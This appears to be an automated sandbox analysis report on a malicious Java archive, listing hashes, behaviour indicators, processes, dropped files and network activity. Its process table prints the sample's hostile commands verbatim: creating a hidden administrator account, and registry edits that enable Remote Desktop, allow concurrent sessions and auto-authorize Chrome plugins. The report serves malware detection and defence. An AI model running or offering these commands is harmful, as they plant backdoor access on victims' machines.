File name:

250427-vcfkasxnv8.bin.jar

Full analysis: https://app.any.run/tasks/7da295a2-4352-4e89-a062-d444fa879048
Verdict: Malicious activity
Analysis date: April 27, 2025, 18:09:44
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags: java
Indicators:
MIME: application/java-archive
File info: Java archive data (JAR)
MD5: D94217BFD30C8FD185D714E945F3D4E3
SHA1: D70734A07E4C07E04B479CD4525FDA33442307F1
SHA256: 8B914ECB7D69A537FE069B62FE8762490B25DCD1E606FCEB9604B8D4488E2DB9
SSDEEP: 49152:iD3EHrtL0NIeI2LSc9m6jqBF3znr4gmBfLFOBWw451MmfnuRvOFNUetcUVa67/Ro:iD3IrtnkSc9/83gLBZOYB51MZCiqRVRa

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts NET.EXE for service management

      • cmd.exe (PID: 7760)
      • net.exe (PID: 8156)
      • net.exe (PID: 8108)
      • net.exe (PID: 6676)
      • net.exe (PID: 7580)
    • Starts NET.EXE to view/add/change user profiles

      • cmd.exe (PID: 7760)
      • net.exe (PID: 7172)
      • net.exe (PID: 2140)
    • Starts NET.EXE to view/change users localgroup

      • net.exe (PID: 4980)
      • cmd.exe (PID: 7760)
      • net.exe (PID: 7012)
      • net.exe (PID: 668)
      • net.exe (PID: 7540)
      • net.exe (PID: 7644)
      • net.exe (PID: 6132)
      • net.exe (PID: 7632)
      • net.exe (PID: 896)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • javaw.exe (PID: 7408)
    • Uses ATTRIB.EXE to modify file attributes

      • cmd.exe (PID: 7556)
      • cmd.exe (PID: 7564)
    • Executing commands from a ".bat" file

      • javaw.exe (PID: 7408)
    • Reads security settings of Internet Explorer

      • javaw.exe (PID: 7408)
    • Takes ownership (TAKEOWN.EXE)

      • cmd.exe (PID: 7760)
    • Uses ICACLS.EXE to modify access control lists

      • cmd.exe (PID: 7760)
    • Executable content was dropped or overwritten

      • javaw.exe (PID: 7408)
    • Reads the date of Windows installation

      • javaw.exe (PID: 7408)
    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 7760)
    • Sets the service to start on system boot

      • sc.exe (PID: 6652)
      • sc.exe (PID: 7696)
    • Starts SC.EXE for service management

      • cmd.exe (PID: 7760)
    • Uses SYSTEMINFO.EXE to read the environment

      • javaw.exe (PID: 7408)
    • There is functionality for taking screenshot (YARA)

      • javaw.exe (PID: 7408)
  • INFO

    • Application based on Java

      • javaw.exe (PID: 7408)
    • Creates files in the program directory

      • javaw.exe (PID: 7408)
    • Reads the computer name

      • javaw.exe (PID: 7408)
    • Create files in a temporary directory

      • javaw.exe (PID: 7408)
    • Process checks computer location settings

      • javaw.exe (PID: 7408)
    • Creates files or folders in the user directory

      • javaw.exe (PID: 7408)
    • Checks supported languages

      • javaw.exe (PID: 7408)
    • Reads the machine GUID from the registry

      • javaw.exe (PID: 7408)
    • Reads the software policy settings

      • slui.exe (PID: 5972)
    • Checks proxy server information

      • slui.exe (PID: 5972)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0808
ZipCompression: Deflated
ZipModifyDate: 2013:04:29 15:42:58
ZipCRC: 0xe380a165
ZipCompressedSize: 597
ZipUncompressedSize: 1914
ZipFileName: META-INF/MANIFEST.MF
No data.
All screenshots are available in the full report
Total processes
199
Monitored processes
77
Malicious processes
2
Suspicious processes
0

Behavior graph

Process chain (as shown in the behavior graph): javaw.exe → icacls.exe, conhost.exe, cmd.exe, cmd.exe, conhost.exe, conhost.exe, attrib.exe, attrib.exe, cmd.exe, conhost.exe, takeown.exe (x4), icacls.exe (x8), net.exe/net1.exe (x8 pairs), reg.exe (x20), sc.exe, net.exe/net1.exe (x3 pairs), sc.exe, net.exe/net1.exe (x3 pairs), systeminfo.exe, conhost.exe, tiworker.exe, slui.exe

Process information

PID | CMD | Path | Indicators | Parent process
668 | C:\WINDOWS\system32\net.exe localgroup administrators ADM123 /add | C:\Windows\System32\net.exe | | cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Net Command
Exit code:
2
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\net.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
896 | net localgroup administradores ADM123 /add | C:\Windows\System32\net.exe | | cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Net Command
Exit code:
2
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\net.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
1072 | C:\WINDOWS\system32\reg.exe ADD "HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\MAIN" /v "Extensions Off Page" /t REG_SZ /d "http://br.msn.com" /f | C:\Windows\System32\reg.exe | | cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
1660 | C:\WINDOWS\system32\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "EnableConcurrentSessions" /t REG_DWORD /d 0x1 /f | C:\Windows\System32\reg.exe | | cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
2088 | C:\WINDOWS\system32\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v "MaxInstanceCount" /t REG_DWORD /d 0x5 /f | C:\Windows\System32\reg.exe | | cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
2140 | net user ADM123 123 /add | C:\Windows\System32\net.exe | | cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Net Command
Exit code:
2
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\net.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
2236 | C:\WINDOWS\system32\reg.exe add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "AllowMultipleTSSessions" /t REG_DWORD /d 0x1 /f | C:\Windows\System32\reg.exe | | cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
2340 | C:\WINDOWS\system32\net1 user ADM123 123 /add | C:\Windows\System32\net1.exe | | net.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Net Command
Exit code:
2
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\net1.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\samcli.dll
c:\windows\system32\ucrtbase.dll
3100 | C:\WINDOWS\system32\reg.exe add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f | C:\Windows\System32\reg.exe | | cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
3156 | C:\WINDOWS\system32\reg.exe ADD "HKLM\Software\Policies\Google\Chrome" /v AlwaysAuthorizePlugins /t REG_DWORD /d 1 /f | C:\Windows\System32\reg.exe | | cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
Total events
9 732
Read events
9 730
Write events
2
Delete events
0

Modification events

(PID) Process: (8024) TiWorker.exe | Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing
Operation: write | Name: SessionIdHigh
Value: 31176607
(PID) Process: (8024) TiWorker.exe | Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Component Based Servicing
Operation: write | Name: SessionIdLow
Value:
Executable files
1
Suspicious files
1
Text files
4
Unknown types
0

Dropped files

PID | Process | Filename | Type
7408 | javaw.exe | C:\ProgramData\Oracle\Java\.oracle_jre_usage\17dfc292991c8061.timestamp | text
MD5: 30923D2198124063A7487342EADA48B2
SHA256: FAC366A33F79D24D1563F2523EAC6C1E2E2A8AEF96BDA2B4067BDB557C77274F
7408 | javaw.exe | C:\Users\admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1693682860-607145093-2874071422-1001\83aa4cc77f591dfc2374580bbd95f6ba_bb926e54-e3ca-40fd-ae90-2764341e7792 | binary
MD5: C8366AE350E7019AEFC9D1E6E6A498C6
SHA256: 11E6ACA8E682C046C83B721EEB5C72C5EF03CB5936C60DF6F4993511DDC61238
8024 | TiWorker.exe | C:\Windows\Logs\CBS\CBS.log | text
MD5: BCDABF2D9D3B3FD15471E8EF992BD536
SHA256: 5DC79DE408D7EB2527B27F0DBEB8BA9E2ADAAFBDC73DDD7BDEBA34F17E0739A7
7408 | javaw.exe | C:\Users\admin\AppData\Local\Temp\jna\jna4459699807285432333.dll | executable
MD5: 715C98AA5955E7E07FB99D87F522E73A
SHA256: B7F1133492A060A857A1EF0877E18E382F1C418E5DAC2E674ABC65F336241D61
7760 | cmd.exe | C:\Users\admin\AppData\Local\Temp\temp.temp | text
MD5: 2F8F3230BBC42E379A1554CA3419D46D
SHA256: 3EFE94E50D33A368DCA95D1B612243AEC88DDBD1353245769C79B82FC857AE09
7408 | javaw.exe | C:\Users\admin\AppData\Local\Temp\Atualizacao.bat | text
MD5: 0107BFE65B47B0EEDF2D28F26EBA72CB
SHA256: EA0AC94232C9A6A02E406ADAA456A6CE56439BDE9A23BE878BAD71A8EE11FC5F
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
520
TCP/UDP connections
536
DNS requests
14
Threats
2

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation
 | | GET | 304 | 20.109.210.53:443 | https://slscr.update.microsoft.com/SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.4046/0?CH=686&L=en-US&P=&PT=0x30&WUA=10.0.19041.3996&MK=DELL&MD=DELL | unknown | | |
7408 | javaw.exe | GET | 200 | 142.250.181.227:80 | http://www.google.com.br/ | unknown | | | whitelisted
7408 | javaw.exe | GET | 200 | 142.250.181.227:80 | http://www.google.com.br/ | unknown | | | whitelisted
7408 | javaw.exe | GET | 200 | 142.250.181.227:80 | http://www.google.com.br/ | unknown | | | whitelisted
7408 | javaw.exe | GET | 200 | 142.250.181.227:80 | http://www.google.com.br/ | unknown | | | whitelisted
7408 | javaw.exe | GET | 200 | 142.250.181.227:80 | http://www.google.com.br/ | unknown | | | whitelisted
7408 | javaw.exe | GET | 200 | 142.250.181.227:80 | http://www.google.com.br/ | unknown | | | whitelisted
7408 | javaw.exe | GET | 200 | 142.250.181.227:80 | http://www.google.com.br/ | unknown | | | whitelisted
7408 | javaw.exe | GET | 200 | 142.250.181.227:80 | http://www.google.com.br/ | unknown | | | whitelisted
7408 | javaw.exe | GET | 200 | 142.250.181.227:80 | http://www.google.com.br/ | unknown | | | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
4 | System | 192.168.100.255:138 | | | | whitelisted
 | | 51.104.136.2:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
 | | 172.211.123.250:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | FR | whitelisted
3216 | svchost.exe | 172.211.123.250:443 | client.wns.windows.com | MICROSOFT-CORP-MSN-AS-BLOCK | FR | whitelisted
7408 | javaw.exe | 142.250.181.227:80 | www.google.com.br | GOOGLE | US | whitelisted
4 | System | 192.168.100.255:137 | | | | whitelisted
8128 | SIHClient.exe | 20.12.23.50:443 | slscr.update.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | US | whitelisted
8128 | SIHClient.exe | 184.24.77.35:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted
8128 | SIHClient.exe | 184.30.21.171:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted
8128 | SIHClient.exe | 13.95.31.18:443 | fe3cr.delivery.mp.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted

DNS requests

Domain | IP | Reputation
settings-win.data.microsoft.com | 51.104.136.2 | whitelisted
google.com | 172.217.18.14 | whitelisted
client.wns.windows.com | 172.211.123.250 | whitelisted
www.google.com.br | 142.250.181.227 | whitelisted
dlls.proxysegura.com | | unknown
slscr.update.microsoft.com | 20.12.23.50 | whitelisted
crl.microsoft.com | 184.24.77.35, 184.24.77.42, 184.24.77.7, 184.24.77.38, 184.24.77.18, 184.24.77.37, 184.24.77.34, 184.24.77.30, 184.24.77.14 | whitelisted
www.microsoft.com | 184.30.21.171 | whitelisted
fe3cr.delivery.mp.microsoft.com | 13.95.31.18 | whitelisted
activation-v2.sls.microsoft.com | 20.83.72.98 | whitelisted

Threats

PID | Process | Class | Message
7408 | javaw.exe | Potentially Bad Traffic | ET INFO Vulnerable Java Version 1.8.x Detected
7408 | javaw.exe | Potentially Bad Traffic | ET INFO Vulnerable Java Version 1.8.x Detected
No debug info